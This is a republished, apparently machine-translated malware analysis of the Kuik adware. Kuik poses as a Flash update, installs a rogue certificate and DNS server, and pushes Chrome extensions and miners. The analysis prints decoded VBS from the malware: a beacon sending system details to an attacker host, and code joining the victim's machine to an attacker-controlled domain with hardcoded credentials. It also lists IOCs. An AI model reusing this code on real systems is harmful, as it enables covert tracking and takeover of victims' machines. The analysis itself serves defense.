Shulou(Shulou.com)06/02 Report--

Today, I will talk to you about how to understand Kuik. Many people may not know much about it. In order to let you know more, Xiaobian summarized the following contents for you. I hope you can gain something according to this article.

Recently, our security research team discovered such malicious adware called Kuik. Attackers are trying to exploit this unique technique to push Google Chrome extensions and cryptocurrency miners to victims. We will conduct further technical analysis of the malicious adware and provide relevant removal instructions for everyone.

Technical Description Stage 1 -. NET installer

0ba20fee958b88c48f3371ec8d8a8e5d

The first phase was an application written using. NET that faked Adobe Flash Player icons. This is a typical malicious bundle, masquerading as an Adobe Flash Player update program to trick users into installing it.

We opened it using the dotNet decompiler (dnSpy) and found that the original name of the project was WWVaper.

It has three internal resources:

Certificate (svr.crt)

A legitimate Flash.

Next Stage Component (upp.exe)

Certificate:

-----BEGIN CERTIFICATE-----MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNVBAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoMDEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMGA1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEWEHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbDoPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4yvHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah5HtIYSJZ2xwIcHqp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eXN6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkGA1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5tZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgBhvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcNAQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVmAC+3h2huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ02zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX+joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ=-----END CERTIFICATE-----

Certificate Details:

The certificate points to a DNS name for yahoo.com. However, the certificate path is invalid:

The. NET installer is responsible for installing malicious certificates and other components. First, it enumerates network interfaces and adds collected IPs to the list:

It then adds the new IP as DNS (18.219.162.248) to the collected interface and installs its own certificate (svr.crt):

Stage 2 - upp.exe

3a13b73f823f081bcdc57ea8cc3140ac

This app is an unobfuscated installer bundle. Inside, we found a cabinet file:

It contains additional modules to delete:

The application "install.exe" is deployed with "setup.bat" as parameter.

Stage 3 -Unpack components from cabinet

The application install.exe is basic. Its sole purpose is to run the next process in elevated mode. Below, you can see its main function:

The script setup.bat deploys another component called SqadU9FBEV.bat:

It delays execution by ping 127.0.0.1. It then runs the second encoded script and provides it with an Activity ID as an argument:

The next element is deployed as a coded VBS script:

After decoding (decoder), we can clearly see the contents of the script: NYkjVVXepl.vbs. We also saw system fingerprints and beacons to servers:

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem") for each System in SystemSet winVer = System.Caption nextFunction trackEvent(eventName, extraData) Set tracking = CreateObject("MSXML2.XMLHTTP") tracking.open "GET", "http://eventz.win:13463/trk? event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False tracking.send err.clearEnd Function

One of the most interesting pieces is adding infected computers to the domain:

SET objNetwork = CREATEOBJECT("WScript.Network")strComputer = objNetwork.ComputerNameSET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\ " & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'")ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)If (ReturnValue 0) Or (err.number 0) Then trackEvent "join-domain-failed", ReturnValue WScript.Quit 1Else trackEvent "join-domain-success", Null WScript.Quit 0End IFPayloads

The program uses a range of payloads, and we found that the attackers particularly prefer fake Chrome extensions. In addition, there are some cryptocurrency miners who are serving:

removed

Malwarebytes users (version 3.x) can remove this threat from their system by running a full scan, which includes unjoining malicious domain controllers and restoring your machine to its original state.

IOCs

Kuik

b9323268bf81778329b8316dec8f093fe71104f16921a1c9358f7ba69dd52686990c019319fc18dca473ac432cdf4c36944b0bce1a447e85ace819300903a79e

Chrome extensions

d-and-h[.] com/fljlngkbcebmlpdlojnndahifaocnipb.crxd-and-h[.] com/123.crxd-and-h[.] com/jpfhjoeaokamkacafjdjbjllgkfkakca.crxd-and-h[.] com/mmemdlochnielijcfpmgiffgkpehgimj.crxkuikdelivery[.] com/emhifpfmcmoghejbfcbnknjjpifkmddc.crxtripan[.] me/kdobijehckphahlmkohehaciojbpmdbp.crx

Payloads

92996D9E7275006AB6E59CF4676ACBB2B4C0E0DF59011347CE207B219CB2B75133D86ABF26EFCDBD673DA5448C958863F384F4E3E678057D6FAB7359685012687889CB16DB3922BEEFB7310B832AE0EF60736843F4AD9FB2BFE9D8B05E48BECD761D62A22AE73307C679 B096030BF0EEC93555E13DC820931519183CAA9F1B2A871AD057247C023F68768724EBF23D00EF842F0B510A3ACE544A8948AE775712 After reading the above, do you have any further understanding of how to understand Kuik? If you still want to know more knowledge or related content, please pay attention to the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.